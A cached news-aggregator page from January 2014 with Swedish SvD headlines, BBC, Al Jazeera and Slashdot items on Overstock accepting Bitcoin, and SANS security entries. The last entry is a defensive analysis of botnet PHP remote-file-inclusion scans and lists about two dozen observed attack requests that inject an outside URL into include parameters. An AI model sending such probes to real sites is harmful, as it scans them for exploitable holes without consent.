Migration är mer än invandring SvD Utrikes(cached at January 9, 2014, 11:32 pm)

Nils sökte jobb via bilannons SvD Inrikes(cached at January 9, 2014, 11:32 pm)

Den udda annonsen gav över 100 jobberbjudanden.
Björn till attack mot hund SvD Inrikes(cached at January 9, 2014, 11:32 pm)

En hund blev på torsdagseftermiddagen attackerad av björn i Piteå.
VIDEO: Art of Mars: Images from red planet BBC News | Science/Nature | UK Edition(cached at January 9, 2014, 11:30 pm)

A decade of images from the red planet
VIDEO: Art of Mars: Images from red planet BBC News | Science/Nature | UK Edition(cached at January 9, 2014, 11:30 pm)

A decade of images from the red planet
Indian consul gets immunity in US fraud case AL JAZEERA ENGLISH (AJE)(cached at January 9, 2014, 11:30 pm)

Devyani Khobragade granted diplomatic status in New York, meaning she will not face visa fraud charges relating to nanny
Indian consul gets immunity in US fraud case AL JAZEERA ENGLISH (AJE)(cached at January 9, 2014, 11:30 pm)

Devyani Khobragade granted diplomatic status in New York, meaning she will not face visa fraud charges relating to nanny
CVE-2013-6982 (Natl. Vulnerability Database) SANS ISC SecNewsFeed(cached at January 9, 2014, 11:30 pm)

Mystiskt sjuka fiskar ska obduceras SvD Inrikes(cached at January 9, 2014, 11:02 pm)

Saknade fenor, skinn som lossnar och beläggningar - sik och lax i Kalixälven har drabbats av mystiska angrepp och fiskare är oroade.
Bitcoin Payments Go Live At Overstock — Two Quarters Early Slashdotby Unknown Lamer on bitcoin at January 1, 1970, 1:00 am (cached at January 9, 2014, 11:02 pm)

New submitter citab writes with news that "the first major retailer is now accepting bitcoins!" In December, Overstock.com announced that they would begin accepting Bitcoin for payment as early as the end of second quarter 2014, but decided to make it a priority task to avoid having someone else beat them to it. From the article: "Last Tuesday, the company struck a deal to handle Bitcoin payments through a service operated by the suddenly hot San Francisco startup Coinbase, and since then, a team of Overstock engineers has worked almost every waking hour to prepare the site for what is undeniably a key moment in the digital currency’s short history. ... [Overstock CEO] Byrne believes this can ultimately boost the company’s bottom line, but that’s not his only aim. For Byrne, a rather opinionated libertarian who’s unafraid to take his company places others fear to tread, embracing the cryptocurrency is as much a political statement as a business decision. Like so many others, he believes Bitcoin can free the world from the control of big banks and big government. 'It helps us fight the machine,' he says."

Read more of this story at Slashdot.








Bitcoin Payments Go Live At Overstock — Two Quarters Early Slashdotby Unknown Lamer on bitcoin at January 1, 1970, 1:00 am (cached at January 9, 2014, 11:02 pm)

New submitter citab writes with news that "the first major retailer is now accepting bitcoins!" In December, Overstock.com announced that they would begin accepting Bitcoin for payment as early as the end of second quarter 2014, but decided to make it a priority task to avoid having someone else beat them to it. From the article: "Last Tuesday, the company struck a deal to handle Bitcoin payments through a service operated by the suddenly hot San Francisco startup Coinbase, and since then, a team of Overstock engineers has worked almost every waking hour to prepare the site for what is undeniably a key moment in the digital currency’s short history. ... [Overstock CEO] Byrne believes this can ultimately boost the company’s bottom line, but that’s not his only aim. For Byrne, a rather opinionated libertarian who’s unafraid to take his company places others fear to tread, embracing the cryptocurrency is as much a political statement as a business decision. Like so many others, he believes Bitcoin can free the world from the control of big banks and big government. 'It helps us fight the machine,' he says."

Read more of this story at Slashdot.








CVE-2014-0621 (Natl. Vulnerability Database) SANS ISC SecNewsFeed(cached at January 9, 2014, 11:00 pm)

CVE-2014-0621 (Natl. Vulnerability Database) SANS ISC SecNewsFeed(cached at January 9, 2014, 11:00 pm)

Oracle announced critical patches for next Tuesday - patching 147 (!!!) vulnerabilit SANS Internet Storm Center, InfoCON: green(cached at January 9, 2014, 11:00 pm)

-- Bojan INFIGO IS

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Massive PHP RFI scans, (Thu, Jan 9th) SANS Internet Storm Center, InfoCON: green(cached at January 9, 2014, 11:00 pm)

Today one of our readers, Yinette, sent in a pcap of a pretty massive PHP RFI scans. Yinette has been seeing this for quite some time and the number of requests sent by this (yet unknown) bot or botnet kept rising.
Judging by the source IP address the bots appear to be running on compromised web servers with typical CPanel installations and large numbers of hosted virtual servers.
 
The scanning requests are relatively fast and in the capture Yinette made the bot constantly sent at least 2 requests per second. All requests try to exploit a RFI vulnerability (I haven’t checked yet to see if all of them are well known, but a cursory inspection says most of them are well known) and the file included is the humans.txt static file on Google (http://www.google.com/humans.txt).
 
The bot almost certainly parses the output and if it sees contents of the humans.txt file it knows that the site has a RFI (Remote File Inclusion) vulnerability. Google’s availability and uptime help of course.
 
Some observed requests are shown below:
 
GET /kernel/class/ixpts.class.php?IXP_ROOT_PATH=http://www.google.com/humans.txt? HTTP/1.0
GET /kernel/loadkernel.php?installPath=http://www.google.com/humans.txt? HTTP/1.0
GET /kmitaadmin/kmitam/htmlcode.php?file=http://www.google.com/humans.txt? HTTP/1.0
GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.google.com/humans.txt? HTTP/1.0
GET /lang/leslangues.php?fichier=http://www.google.com/humans.txt? HTTP/1.0
GET /lang_english/lang_main_album.php?phpbb_root_path=http://www.google.com/humans.txt?a= HTTP/1.0
GET /language/lang_english/lang_activity.php?phpbb_root_path=http://www.google.com/humans.txt? HTTP/1.0
GET /language/lang_english/lang_admin_album.php?phpbb_root_path=http://www.google.com/humans.txt?a= HTTP/1.0
GET /language/lang_german/lang_admin_album.php?phpbb_root_path=http://www.google.com/humans.txt?a= HTTP/1.0
GET /language/lang_german/lang_main_album.php?phpbb_root_path=http://www.google.com/humans.txt?a= HTTP/1.0
GET /latestposts.php?forumspath=http://www.google.com/humans.txt? HTTP/1.0
GET /latex.php?bibtexrootrel=http://www.google.com/humans.txt? HTTP/1.0
GET /layout/default/params.php?gConf[dir][layouts]=http://www.google.com/humans.txt? HTTP/1.0
GET /ldap/authldap.php?includePath=http://www.google.com/humans.txt? HTTP/1.0
GET /learnPath/include/scormExport.inc.php?includePath=http://www.google.com/humans.txt? HTTP/1.0
GET /lib.editor.inc.php?sys_path=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/Loggix/Module/Calendar.php?pathToIndex=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/Loggix/Module/Comment.php?pathToIndex=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/Loggix/Module/Rss.php?pathToIndex=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/Loggix/Module/Trackback.php?pathToIndex=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/action/rss.php?lib=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/activeutil.php?set[include_path]=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/addressbook.php?GLOBALS[basedir]=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/armygame.php?libpath=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/authuser.php?root=http://www.google.com/humans.txt? HTTP/1.0
 
This is only a small part of all the requests the bot sends. In total, on Yinette’s web site it sent 804 requests (that’s 804 vulnerabilities it’s trying to exploit)! This indeed might be someone trying to build a big(er) botnet.

Are you seeing same/similar requests on your web site too? Or maybe you managed to catch the bot on a compromised machine or a honeypot? Let us know!

--
Bojan
@bojanz
INFIGO IS

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.